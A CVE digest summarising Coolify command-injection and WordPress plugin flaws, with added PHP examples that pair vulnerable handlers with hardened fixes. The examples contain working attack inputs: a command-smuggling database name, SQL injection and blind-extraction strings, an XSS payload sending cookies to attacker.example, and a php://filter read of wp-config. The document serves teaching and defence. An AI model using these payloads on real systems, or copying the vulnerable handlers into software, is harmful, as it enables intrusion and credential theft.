17 CVEs tracked today: 1 Critical, 4 High, 2 Medium, 0 Low; the remaining 10 have no severity assigned yet.
-
CVE-2025-66209
CRITICAL
CVSS 9.9
A command injection vulnerability in Coolify's Database Backup functionality allows authenticated users with application/service management permissions to execute arbitrary commands as root on managed servers. The vulnerability affects all Coolify versions prior to 4.0.0-beta.451, and a proof-of-concept exploit is publicly available. With a CVSS score of 9.9 and working exploit code in the open, this is a critical risk for organizations that use Coolify to manage their infrastructure.
Command Injection
RCE
Coolify
-
CVE-2025-66213
HIGH
CVSS 8.8
An authenticated command injection vulnerability in Coolify's File Storage Directory Mount Path functionality allows users with application/service management permissions to execute arbitrary commands as root on managed servers. The vulnerability affects all Coolify versions prior to 4.0.0-beta.451 and has a publicly available proof-of-concept exploit, though current exploitation probability remains relatively low at 0.20% according to EPSS data. Attackers can achieve full remote code execution with root privileges on the host system by exploiting unsanitized input in the file_storage_directory_source parameter.
Command Injection
RCE
Coolify
-
CVE-2025-66212
HIGH
CVSS 8.8
An authenticated command injection vulnerability in Coolify's Dynamic Proxy Configuration Filename handling allows users with application/service management permissions to execute arbitrary commands as root on managed servers. The vulnerability affects all Coolify versions prior to 4.0.0-beta.451; a proof-of-concept exploit is publicly available, and the EPSS score is 0.20% (41st percentile), a low absolute exploitation probability. Attackers can achieve full remote code execution with root privileges by injecting shell metacharacters through unescaped proxy configuration filenames.
Command Injection
RCE
Coolify
-
CVE-2025-66211
HIGH
CVSS 8.8
An authenticated command injection vulnerability in Coolify's PostgreSQL initialization script handling allows attackers with application/service management permissions to execute arbitrary commands as root on managed servers. The vulnerability affects all Coolify versions prior to 4.0.0-beta.451 and enables full remote code execution through unsanitized PostgreSQL init script filenames passed to shell commands. A public proof-of-concept exploit is available; the vulnerability is not currently in CISA KEV, and its EPSS score of 0.41% indicates a low but non-negligible exploitation probability.
Command Injection
PostgreSQL
RCE
Privilege Escalation
Docker
-
CVE-2025-66210
HIGH
CVSS 8.8
A command injection vulnerability in Coolify's Database Import functionality allows authenticated users with application/service management permissions to execute arbitrary system commands as root on managed servers. The vulnerability stems from unsanitized database names being passed directly to shell commands, enabling full remote code execution. A public proof-of-concept exploit is available, and with an EPSS score of 0.41% (61st percentile: a low absolute value, but higher than most CVEs) this represents a moderate real-world exploitation risk for organizations running vulnerable Coolify versions.
Command Injection
RCE
Docker
Linux
Coolify
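The five Coolify entries above (CVE-2025-66209 through CVE-2025-66213) share one root cause: a string an authenticated user controls (a database name, a backup or init-script filename, a mount path) is interpolated into a shell command that runs as root on the managed server. The snippet below is an added illustration of that pattern and of the fix, written for this page; it is not Coolify's code, and the command shape, function names and the payload are constructed for the example.

```php
<?php
// Added example, not Coolify's code: a user-supplied database name is built
// into a shell command. The vulnerable builder interpolates it verbatim; the
// hardened builder validates it and quotes every argument.

// VULNERABLE: string interpolation straight into the shell command line.
function build_backup_command_vulnerable(string $database): string
{
    return "docker exec db pg_dump -U postgres {$database} > /backups/{$database}.sql";
}

// HARDENED, layer 1: reject anything that is not a plausible identifier.
// Database names used here are restricted to [A-Za-z0-9_-], max 63 chars.
function assert_safe_identifier(string $value): string
{
    if (!preg_match('/\A[A-Za-z0-9_-]{1,63}\z/', $value)) {
        throw new InvalidArgumentException('Rejected unsafe identifier: ' . json_encode($value));
    }
    return $value;
}

// HARDENED, layer 2: even after validation, wrap each argument with
// escapeshellarg() so the shell can never parse it as syntax.
function build_backup_command_hardened(string $database): string
{
    $name = assert_safe_identifier($database);
    return sprintf(
        'docker exec db pg_dump -U postgres %s > %s',
        escapeshellarg($name),
        escapeshellarg('/backups/' . $name . '.sql')
    );
}

// Constructed input: a "database name" that smuggles a second command.
$payload = 'app; id > /tmp/pwned #';

echo 'vulnerable: ', build_backup_command_vulnerable($payload), PHP_EOL;
// The shell runs pg_dump for "app", then runs `id` with its output redirected,
// and the trailing `#` comments out the rest of the original command line.

try {
    echo 'hardened:   ', build_backup_command_hardened($payload), PHP_EOL;
} catch (InvalidArgumentException $e) {
    echo 'hardened:   ', $e->getMessage(), PHP_EOL;   // the payload never reaches a shell
}
echo 'hardened:   ', build_backup_command_hardened('app_prod'), PHP_EOL;
// docker exec db pg_dump -U postgres 'app_prod' > '/backups/app_prod.sql'
```

The allow-list is the real fix; escapeshellarg() is defense in depth for the day someone widens the regex. In a Laravel codebase the cleaner option is to avoid the shell entirely by passing an argument array to Symfony's Process (new Process(['docker', 'exec', 'db', 'pg_dump', '-U', 'postgres', $name])), which execs the binary directly, so metacharacters in $name are just bytes in one argument. Redirection then has to be done in PHP rather than with `>`.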
-
CVE-2025-14163
MEDIUM
CVSS 4.3
Cross-Site Request Forgery in the Premium Addons for Elementor plugin, versions up to 4.11.53, allows unauthenticated remote attackers to create arbitrary Elementor templates by exploiting missing nonce validation in the 'insert_inner_template' function. The attacker must trick a site administrator, or another user with the edit_posts capability, into clicking a malicious link while logged in; no public exploit code has been identified. The EPSS score of 0.02% indicates very low exploitation probability in practice despite the CVSS 4.3 rating.
WordPress
CSRF
Premium Addons For Elementor
-
CVE-2025-14155
MEDIUM
CVSS 5.3
Unauthenticated attackers can access private, draft, and pending template content in the Premium Addons for Elementor WordPress plugin (versions up to 4.11.53) due to a missing capability check in the 'get_template_content' function. Because the function never verifies who is asking, anyone can retrieve template data that should be restricted, with no user interaction and no privileges required. A vendor patch is available; the CVSS score of 5.3 reflects limited impact (read-only disclosure of template content) combined with no prerequisites for the attacker.
Authentication Bypass
WordPress
Premium Addons For Elementor
-
CVE-2025-68561
None
SQL injection in the AutomatorWP WordPress plugin through version 5.2.4 allows authenticated attackers to execute arbitrary SQL commands. User-supplied input reaches the plugin's database queries without proper sanitization or parameterization. The EPSS score of 0.04% indicates low exploitation probability, but SQL injection is a high-impact primitive if exploited, potentially enabling data exfiltration, modification, or deletion in the affected WordPress database.
WordPress
PHP
SQLi
-
CVE-2025-68560
None
Local file inclusion vulnerability in the CodexThemes TheGem Theme Elements (for Elementor) WordPress plugin through version 5.10.5.1: a filename parameter is used in a PHP include/require statement without adequate control, so an attacker can make the server include arbitrary local files, exposing their contents (and executing any PHP they contain). The EPSS score is low at 0.17% (38th percentile), indicating minimal observed exploitation probability despite this being a classic PHP file inclusion flaw in an Elementor page builder plugin.
WordPress
PHP
Lfi
-
CVE-2025-68559
None
Cross-site scripting (XSS) vulnerability in the CodexThemes TheGem Theme Elements (for Elementor) plugin through version 5.10.5.1, caused by improper neutralization of input during web page generation. Attackers can inject malicious scripts that execute in the browsers of other users, potentially compromising WordPress site visitors and administrators. No active exploitation has been confirmed at the time of analysis, and the low EPSS score (0.04%) suggests limited real-world exploitation likelihood despite the flaw's presence in a widely used Elementor theme plugin.
WordPress
PHP
XSS
-
CVE-2025-68557
None
The Chakra test WordPress plugin, version 1.0.1 and earlier, fails to properly enforce access control, allowing unauthenticated or lower-privileged users to reach functionality that should be restricted to higher privileges. The root cause is incorrectly configured security levels: the plugin does not validate the caller's permissions before executing sensitive operations. The EPSS score is very low (0.04%), suggesting limited real-world exploitation so far despite the missing authorization check.
Authentication Bypass
-
CVE-2025-68556
None
Missing authorization in the VillaTheme HAPPY helpdesk plugin, versions up to 1.0.9, allows unauthenticated attackers to bypass access restrictions and interact with support ticket functionality without any permission check. The flaw affects WordPress installations running the vulnerable plugin and could permit unauthorized access to sensitive support tickets and helpdesk operations. The issue was reported by Patchstack security researchers; its EPSS exploitation probability is low (0.04%) despite the authorization flaw.
WordPress
PHP
Authentication Bypass
-
CVE-2025-68551
None
The VPSUForm WordPress plugin, versions 3.2.24 and earlier, exposes sensitive system information to unauthorized users through improper access controls, allowing attackers to retrieve data that should be limited to administrators or authenticated users. The vulnerability affects a widely deployed WordPress form plugin and has an EPSS score of 0.05% (low exploitation probability), with no confirmed active exploitation or public exploit code at the time of analysis.
Information Disclosure
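CVE-2025-14163 (missing nonce check) and the missing-authorization entries CVE-2025-14155, CVE-2025-68557, CVE-2025-68556 and CVE-2025-68551 are the two halves of the same WordPress handler mistake: accepting a request without proving it was intentionally sent (CSRF nonce) and without proving the caller is allowed to do it (capability check). The following added example, written for this page and not taken from any of those plugins, shows an admin-ajax handler with both checks missing next to a hardened one. It runs inside WordPress (for example dropped into wp-content/mu-plugins); the action names, the 'id' and 'nonce' parameters and the demo_ prefix are assumptions for illustration.

```php
<?php
/*
 * Added example for this page, not code from the plugins listed above.
 * Two admin-ajax handlers that return a template's content by post ID.
 */

// VULNERABLE: reachable by anonymous users (wp_ajax_nopriv_), no nonce, no
// capability check, and it ignores post status. Anyone can read private,
// draft or pending templates by iterating IDs, and a logged-in user can be
// CSRF'd into calling any state-changing sibling written the same way.
add_action('wp_ajax_demo_template_v1', 'demo_get_template_vulnerable');
add_action('wp_ajax_nopriv_demo_template_v1', 'demo_get_template_vulnerable');
function demo_get_template_vulnerable(): void
{
    $post = get_post((int) ($_REQUEST['id'] ?? 0));
    wp_send_json_success(['content' => $post ? $post->post_content : '']);
}

// HARDENED: logged-in users only (no nopriv hook), nonce verified, and the
// capability checked against the specific post rather than "is logged in".
add_action('wp_ajax_demo_template_v2', 'demo_get_template_hardened');
function demo_get_template_hardened(): void
{
    // 1. CSRF: the request must carry a nonce minted for this action. The
    //    client obtains it via wp_create_nonce('demo_template_v2'); on a bad
    //    or missing nonce check_ajax_referer() ends the request with 403.
    check_ajax_referer('demo_template_v2', 'nonce');

    // 2. Authorization: edit_post is a meta capability that map_meta_cap()
    //    resolves per post (edit_others_posts, edit_private_posts, ...), so a
    //    Contributor cannot read another author's private template.
    $post_id = absint($_REQUEST['id'] ?? 0);
    if (!$post_id || !current_user_can('edit_post', $post_id)) {
        wp_send_json_error(['message' => 'forbidden'], 403);
    }

    $post = get_post($post_id);
    if (!$post) {
        wp_send_json_error(['message' => 'not found'], 404);
    }
    wp_send_json_success(['content' => $post->post_content]);
}

// Client side (assumed script handle 'demo'): hand the nonce to the browser
// so it can be sent back as the 'nonce' request parameter.
add_action('wp_enqueue_scripts', function (): void {
    wp_localize_script('demo', 'demoAjax', [
        'url'   => admin_url('admin-ajax.php'),
        'nonce' => wp_create_nonce('demo_template_v2'),
    ]);
});
```

Two points worth checking in a review: the nonce is a CSRF control, not an authorization control, so a handler with only check_ajax_referer() is still open to every logged-in user; and a capability check on a generic cap such as edit_posts (as opposed to edit_post on the object) still lets a Contributor read other people's private drafts. The same pair applies to REST routes, where the nonce arrives in the X-WP-Nonce header and the capability check belongs in permission_callback.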
-
CVE-2025-68550
None
Blind SQL injection in the VillaTheme WPBulky plugin (wpbulky-wp-bulk-edit-post-types) through version 1.1.13 allows attackers to extract sensitive data from WordPress databases via improper neutralization of special elements used in an SQL command. The issue was confirmed by security audit firm Patchstack; no public exploit code or active exploitation had been documented at the time of analysis.
WordPress
PHP
SQLi
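CVE-2025-68561 and CVE-2025-68550 are both the same mistake in $wpdb code: request input concatenated into the SQL string. The blind variant differs only in how the attacker reads the answer (row count or response delay instead of an error message), so the fix is identical. The following added example, written for this page and not taken from AutomatorWP or WPBulky, shows the concatenated query next to the parameterised one. It runs inside WordPress; the demo_tickets table, its columns and the request parameters are assumptions for illustration.

```php
<?php
/*
 * Added example for this page, not code from the plugins listed above.
 * Looks up tickets by a status value that came from the request.
 */

// VULNERABLE: the request value lands inside the SQL string unchanged.
//   status=open' OR 1=1 --         returns every row
//   status=open' AND SLEEP(5) --   time-based blind: the delay is the oracle
//   status=open' AND SUBSTRING((SELECT user_pass FROM wp_users LIMIT 1),1,1)='$' --
//                                  boolean-based blind: rows come back only when
//                                  the guessed character is right
function demo_tickets_by_status_vulnerable(string $status): array
{
    global $wpdb;
    $table = $wpdb->prefix . 'demo_tickets';
    $sql   = "SELECT id, subject FROM {$table} WHERE status = '{$status}'";
    return $wpdb->get_results($sql, ARRAY_A);
}

// HARDENED: values go through placeholders. %s is escaped and quoted by
// WordPress, %d is cast to int, %f to float. The format string itself must
// never contain user input, and prepare() must always be given placeholders.
function demo_tickets_by_status_hardened(string $status, int $limit = 50): array
{
    global $wpdb;
    $table = $wpdb->prefix . 'demo_tickets';
    $sql   = $wpdb->prepare(
        "SELECT id, subject FROM {$table} WHERE status = %s ORDER BY id DESC LIMIT %d",
        $status,
        $limit
    );
    return $wpdb->get_results($sql, ARRAY_A);
}

// Identifiers and keywords (column names, ASC/DESC) are not values and cannot
// be bound with %s; allow-list them before they reach the query.
function demo_order_clause(string $column, string $direction): string
{
    $columns = ['id', 'subject', 'status', 'created_at'];
    $column  = in_array($column, $columns, true) ? $column : 'id';
    $dir     = strtoupper($direction) === 'ASC' ? 'ASC' : 'DESC';
    return "ORDER BY {$column} {$dir}";
}
```

A grep for `$wpdb->` calls whose first argument is a double-quoted string containing `$_GET`, `$_POST`, `$_REQUEST` or a variable derived from them finds most of this class in a plugin audit; so does `prepare(` called with a single argument. From WordPress 6.2 onward prepare() also accepts the %i placeholder for identifiers, which replaces the hand-written column allow-list (the ASC/DESC keyword still needs one).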
-
CVE-2025-68548
None
Stored cross-site scripting (XSS) in the WebCodingPlace Responsive Posts Carousel Pro WordPress plugin, versions 15.2 and earlier, allows authenticated users to inject malicious scripts that execute in the browsers of other site visitors. The root cause is improper input sanitization during web page generation; because the payload is stored, it fires for every user who loads the affected page, including administrators, enabling session theft or actions performed as the victim. The EPSS exploitation probability is low (0.04%, 14th percentile), indicating limited observed exploitation despite the stored nature of the flaw.
WordPress
PHP
XSS
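The two XSS entries (CVE-2025-68559 and CVE-2025-68548) come down to a value that is stored by one user and printed to others without escaping for the context it lands in. The following added example, written for this page and not taken from TheGem or Responsive Posts Carousel Pro, shows a carousel caption saved and rendered raw, next to the version that authorizes the write, sanitizes what is stored, and escapes again on output. It runs inside WordPress; the demo_caption meta key, the nonce action and the demo_ names are assumptions for illustration.

```php
<?php
/*
 * Added example for this page, not code from the plugins listed above.
 * A caption that a contributor-level user saves and the site later prints.
 */

// VULNERABLE: stored unescaped, printed unescaped. A caption such as
//   <img src=x onerror="fetch('https://attacker.example/?c='+document.cookie)">
// runs in the browser of every visitor and of any administrator who previews
// the page, where it executes with the administrator's session.
function demo_save_caption_vulnerable(int $post_id): void
{
    update_post_meta($post_id, 'demo_caption', $_POST['caption'] ?? '');
}
function demo_render_caption_vulnerable(int $post_id): string
{
    return '<div class="caption">' . get_post_meta($post_id, 'demo_caption', true) . '</div>';
}

// HARDENED: authorize the write, reduce what is stored to the markup the
// feature needs, and escape on output for the exact context.
function demo_save_caption_hardened(int $post_id): void
{
    check_admin_referer('demo_save_caption');                 // CSRF
    if (!current_user_can('edit_post', $post_id)) {           // authorization
        wp_die('forbidden', '', ['response' => 403]);
    }
    // wp_unslash() removes the slashes WordPress adds to $_POST;
    // wp_kses_post() keeps the tags a post author may use and strips <script>,
    // on* event handlers and javascript: URLs.
    $caption = wp_kses_post(wp_unslash($_POST['caption'] ?? ''));
    update_post_meta($post_id, 'demo_caption', $caption);
}
function demo_render_caption_hardened(int $post_id): string
{
    $caption = (string) get_post_meta($post_id, 'demo_caption', true);
    // Escape per context even though the stored value was sanitized: the
    // database may hold values written by older code or by other plugins.
    //   HTML fragment -> wp_kses_post()    plain text -> esc_html()
    //   attribute     -> esc_attr()        href/src   -> esc_url()
    //   value for JS  -> wp_json_encode()
    return '<div class="caption" title="' . esc_attr(wp_strip_all_tags($caption)) . '">'
         . wp_kses_post($caption)
         . '</div>';
}
```

Sanitizing on input and escaping on output are separate controls; a plugin that does only the first is one data path away from the same bug (an import, a migration, a REST route that bypasses the save handler). The title attribute above is deliberately escaped differently from the element body, because an attribute and an HTML fragment have different metacharacters.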
-
CVE-2025-68546
None
Local file inclusion (LFI) vulnerability in the Thembay Nika WordPress theme, version 1.2.14 and earlier, allows unauthenticated attackers to include arbitrary files from the server via improper control of a filename parameter used in a PHP include/require statement. The vulnerability has a low EPSS score (0.17%, 38th percentile) and no confirmed active exploitation, but successful exploitation could disclose sensitive configuration files, source code, or other protected data.
WordPress
PHP
Lfi
-
CVE-2025-68544
None
Local file inclusion (LFI) vulnerability in the Thembay Diza WordPress theme, versions up to and including 1.3.15, allows unauthenticated attackers to include arbitrary files from the server filesystem via improper control of a filename parameter used in a PHP include/require statement. No public exploit code had been identified at the time of analysis, and the low EPSS score (0.17%) suggests limited real-world exploitation probability, even though the attack vector is remote and unauthenticated.
PHP
Lfi
WordPress
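The three LFI entries (CVE-2025-68560, CVE-2025-68546 and CVE-2025-68544) describe the same construct: a template or layout name from the request reaches include/require after, at most, a prefix and suffix are glued on. The following added example, written for this page and not taken from TheGem, Nika or Diza, shows such a loader next to a hardened one and runs from the command line as plain PHP. The temporary template directory, the parameter values and the demo_ names are constructed for the example.

```php
<?php
/*
 * Added example for this page, not code from the themes or plugins above.
 * A template loader that takes the template name from the request.
 */

// A throwaway template directory so the example runs anywhere.
$demoDir = sys_get_temp_dir() . '/demo_templates_' . getmypid();
mkdir($demoDir);
file_put_contents($demoDir . '/hero.php', "<?php echo 'hero template rendered', PHP_EOL;\n");
define('DEMO_TEMPLATE_DIR', $demoDir);

// VULNERABLE: the request value reaches include() with only a suffix appended.
// Without a suffix, any file is included: /etc/passwd, a log file the attacker
// poisoned with PHP, an uploaded image containing PHP. With a fixed ".php"
// suffix the attacker is limited to existing .php files and stream wrappers,
// which is still enough to read source:
//   tpl=php://filter/convert.base64-encode/resource=../../wp-config
// returns wp-config.php base64-encoded (database credentials included)
// instead of executing it.
function demo_load_template_vulnerable(string $tpl): void
{
    include DEMO_TEMPLATE_DIR . '/' . $tpl . '.php';
}

// HARDENED: allow-list the name, then verify the resolved path before include.
function demo_resolve_template(string $tpl): ?string
{
    // 1. Bare names only: no slashes, dots, NULs or wrapper prefixes.
    if (!preg_match('/\A[a-z0-9_-]{1,64}\z/', $tpl)) {
        return null;
    }
    // 2. realpath() collapses ".." and follows symlinks; the result must stay
    //    under the template directory. This also rejects a symlink planted
    //    inside the directory that points outside it.
    $base = realpath(DEMO_TEMPLATE_DIR);
    $path = realpath($base . '/' . $tpl . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function demo_load_template_hardened(string $tpl): bool
{
    $path = demo_resolve_template($tpl);
    if ($path === null) {
        return false;   // caller answers 404; never echo the attempted name unescaped
    }
    include $path;
    return true;
}

// Constructed inputs: one legitimate name, three traversal/wrapper attempts.
foreach (['hero', '../wp-config', 'hero/../../etc/passwd', 'php://filter/resource=hero'] as $tpl) {
    echo str_pad(json_encode($tpl), 36), ' -> ';
    if (!demo_load_template_hardened($tpl)) {
        echo 'rejected', PHP_EOL;
    }
}

unlink($demoDir . '/hero.php');
rmdir($demoDir);
```

Only the first input renders; the other three never reach the filesystem because the allow-list rejects them, and the realpath() check stays as a second line of defence for anything that slips past a later, looser regex. The lookup-table alternative (map a short key to a hard-coded file path and include that) removes the parameter from the path entirely and is preferable when the set of templates is fixed.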